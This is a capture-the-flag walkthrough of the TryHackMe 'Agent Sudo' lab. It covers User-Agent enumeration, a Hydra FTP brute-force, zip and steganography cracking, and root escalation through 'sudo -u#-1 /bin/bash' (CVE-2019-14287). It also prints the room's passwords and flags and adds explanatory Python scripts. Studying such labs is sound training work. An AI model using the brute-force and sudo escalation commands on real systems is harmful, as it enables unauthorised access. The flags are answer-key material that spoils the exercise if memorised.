Agent Sudo — Try Hack Me Room

mohomed arfath
5 min read · Feb 7, 2021

Task 2 Enumerate

How many open ports?

How you redirect yourself to a secret page?

The main page says "use your Codename as User-agent". One of the users' codenames is Agent R, so let's assume every agent's codename is a single letter, which gives 26 candidates (the English alphabet).

So the answer is user-agent

What is the agent name?

hint - You might face problems using Firefox. Try the 'User Agent Switcher' plugin with user agent: C

The hint shows that changing the User-Agent header in the request triggers a redirect to another page.
The first step is to capture the request in Burp and send it to Intruder for further investigation.

Then mark the User-Agent value as the payload position and run an attack whose payload list is the full English alphabet.

When the payload is the letter C, the status code changes to 302, which means a redirect
to another URL.
The response carries a Location header, and that header holds the URL.

This is the message that shows in that URL
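The same sweep done without Burp, as an added example that is not part of the original write-up: the script tries every uppercase letter as the User-Agent, refuses to follow redirects so the 302 and its Location header stay visible, and reports each redirect. Because the room's server is not reachable offline, the block starts a constructed stand-in on localhost that redirects only for the User-Agent "C"; that server, its secret path and the port are assumptions for the demo, not the room's real target.

```python
import http.client
import string
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the room's web server (an assumption for this demo,
# not the real target): it redirects only when the User-Agent is exactly "C".
SECRET_AGENT = "C"
SECRET_PATH = "/secret_page_for_agent_C"  # hypothetical path, not the room's


class MockAgentHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if ua == SECRET_AGENT:
            self.send_response(302)
            self.send_header("Location", SECRET_PATH)
            self.end_headers()
        else:
            body = b"Use your codename as User-Agent to access the site.\n"
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock_server():
    """Start the stand-in server on a free localhost port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockAgentHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe(host, port, user_agent, path="/"):
    """Send one GET with the given User-Agent and return (status, Location).

    http.client does not follow redirects, so a 302 is returned as-is,
    which is exactly what Intruder shows in its results table.
    """
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"User-Agent": user_agent})
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def sweep_user_agents(host, port, candidates=string.ascii_uppercase):
    """Try each candidate codename as User-Agent.

    Returns a list of (user_agent, status, location) for every response
    that is a redirect; anything else is treated as "no secret page".
    """
    hits = []
    for ua in candidates:
        status, location = probe(host, port, ua)
        if status in (301, 302, 303, 307, 308):
            hits.append((ua, status, location))
    return hits


if __name__ == "__main__":
    server, port = start_mock_server()
    try:
        for ua, status, location in sweep_user_agents("127.0.0.1", port):
            print(f"User-Agent: {ua} -> {status} Location: {location}")
    finally:
        server.shutdown()
```

Against the real room you would drop the mock server and call sweep_user_agents with the target's IP and port 80; the Location value the script prints is the URL to open next.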

Task 3 Hash cracking and brute-force

FTP password

In the previous task we got the username; now we need to run a brute-force attack with Hydra to get the password.

Command → hydra -l Chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.117.53

So the password is crystal

Zip file password

Now we have the username and the password.
Let's log in to the FTP server.

There are 3 files to download; run the command get <FILE_NAME> for each one.

The hint says the password is hidden in the image files.
Let's use binwalk to extract the files embedded in the images.

After extraction there will be a zip file protected by a password.

Let's use zip2john to get the hash of the zip, then crack that hash with John the Ripper to recover the password.
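What binwalk is doing in the step above, as an added example that is not part of the original write-up: it scans the file for known signatures and carves out whatever follows. The script below looks for the ZIP local-file-header magic (PK\x03\x04), slices from that offset, checks that the slice opens as an archive and reports whether its entries are password-protected. The image bytes are constructed in memory (a fake JPEG header with a tiny zip appended); the entry name and contents are placeholders, not the room's real file.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # ZIP local file header signature
JPEG_SOI = b"\xff\xd8\xff"  # JPEG start-of-image marker


def build_sample_image():
    """Constructed stand-in for the downloaded image (assumption, not the room's file):
    a minimal fake JPEG with a ZIP archive appended after the end-of-image marker."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", "constructed placeholder, not the room's real message\n")
    fake_jpeg = JPEG_SOI + b"\xe0" + b"\x00\x10JFIF\x00" + b"\x00" * 64 + b"\xff\xd9"
    return fake_jpeg + buf.getvalue()


def find_embedded_zips(data):
    """Return every byte offset where a ZIP local-file-header signature occurs.

    This is the signature scan binwalk performs; each hit is a candidate
    archive start (the first one is normally the real archive).
    """
    offsets, pos = [], 0
    while (pos := data.find(ZIP_MAGIC, pos)) != -1:
        offsets.append(pos)
        pos += len(ZIP_MAGIC)
    return offsets


def carve_zip(data):
    """Carve the archive from the first ZIP signature to end of file.

    Returns (offset, member_names, encrypted). The zip is validated by
    actually opening it; `encrypted` is bit 0 of the general-purpose flag,
    which is what marks a password-protected entry.
    """
    offsets = find_embedded_zips(data)
    if not offsets:
        raise ValueError("no ZIP signature found in input")
    start = offsets[0]
    zf = zipfile.ZipFile(io.BytesIO(data[start:]))
    names = zf.namelist()
    encrypted = any(info.flag_bits & 0x1 for info in zf.infolist())
    return start, names, encrypted


if __name__ == "__main__":
    image = build_sample_image()
    offset, names, encrypted = carve_zip(image)
    print(f"ZIP found at offset {offset}: {names} (encrypted={encrypted})")
    with open("carved.zip", "wb") as f:  # what `binwalk -e` would write to _<file>.extracted/
        f.write(image[offset:])
```

On the real image the `encrypted` flag comes back True, which is the signal to hand the archive to zip2john; the sample here is unencrypted only because the standard library cannot write password-protected zips.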

steg password

Now that we know the password, run 7z e <zip_file> to extract the archive.
Inside it there is a file called To_agentR.txt.

Opening it, you can see a message for agent C a.k.a. Chris.

To_agentR.txt contains an encoded password. Using CyberChef we can decode it and recover the password.

Who is the other agent (in full name)?

James

SSH password

The password obtained in the previous step is the passphrase for the next stage: the SSH password is hidden inside the image, and steghide can extract the secret message with it.

Password is Hackerrules!

Task 4 Capture the user flag

Now let's log in to the system using SSH.

There are 2 files in James's home directory: user.txt and Alien_autospy.jpg.

FLAG — b03d975e8c92a7c04146cfa7a5a317

Now let's download the image with the command below:

scp username@<IP>:<FILE_NAME> <DOWNLOAD_PATH>

To find the name of the article the image comes from, upload it to Google's reverse image search. The search leads to the article the question refers to.

What is the incident of the photo called?

Roswell Alien autopsy

Task 5 Privilege escalation

Let's run sudo -l to find out which programs James can run with sudo privileges.

The sudo version running on James's machine is 1.8.21p2, an old version of sudo. Let's try to find an exploit for it.

A quick Google search turns up an exploit for this; the link is provided here.

To get root access, run this command:
sudo -u#-1 /bin/bash
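Why that command works, and a check you can run before trying it, as an added example that is not part of the original write-up. In sudo before 1.8.28 a Runas rule like (ALL, !root) lets the user pick any target uid except 0; the numeric form -u#-1 (or #4294967295) is not 0, so the !root exclusion does not match, yet setresuid(-1) means "leave the uid unchanged" and sudo is already running as root, so the shell starts as uid 0. The script parses `sudo -V` and `sudo -l` output and reports which commands fit that pattern. The two output samples are constructed (the hostname agent-sudo is an assumption); the version matches the one the page reports.

```python
import re

# Constructed sample outputs (not captured from the room; hostname is an assumption).
SAMPLE_SUDO_VERSION = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDO_L = """Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""

FIXED_IN = (1, 8, 28, 0)  # CVE-2019-14287 was fixed in sudo 1.8.28


def parse_sudo_version(text):
    """Turn the first line of `sudo -V` into a comparable tuple, e.g. 1.8.21p2 -> (1, 8, 21, 2)."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def runas_specs(sudo_l_text):
    """Yield (runas_spec, command) pairs from `sudo -l`, e.g. ('ALL, !root', '/bin/bash')."""
    for m in re.finditer(r"^\s*\(([^)]*)\)\s*(.+)$", sudo_l_text, re.M):
        command = m.group(2).strip()
        # drop tags such as NOPASSWD: that may precede the command
        command = re.sub(r"^(?:[A-Z]+:\s*)+", "", command)
        yield m.group(1), command


def cve_2019_14287_candidates(version_text, sudo_l_text):
    """Return the commands exploitable via `sudo -u#-1 <command>`.

    Two conditions must hold: sudo older than 1.8.28, and a Runas user list
    that allows ALL while excluding root (spelled !root or !#0).
    """
    if parse_sudo_version(version_text) >= FIXED_IN:
        return []
    hits = []
    for spec, command in runas_specs(sudo_l_text):
        users = [u.strip() for u in spec.split(":")[0].split(",")]
        if "ALL" in users and ("!root" in users or "!#0" in users):
            hits.append(command)
    return hits


if __name__ == "__main__":
    print("sudo version:", parse_sudo_version(SAMPLE_SUDO_VERSION))
    for command in cve_2019_14287_candidates(SAMPLE_SUDO_VERSION, SAMPLE_SUDO_L):
        print(f"candidate: sudo -u#-1 {command}")
```

On a live box, feed the script the real output of `sudo -V` and `sudo -l`; if it prints nothing, either sudo is patched or the rule does not use the ALL-minus-root pattern and this CVE does not apply.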

CVE number for the escalation

CVE-2019-14287

What is the root flag?

b53a02f55b57d4439e3341834d70c062

(Bonus) Who is Agent R?

DesKel
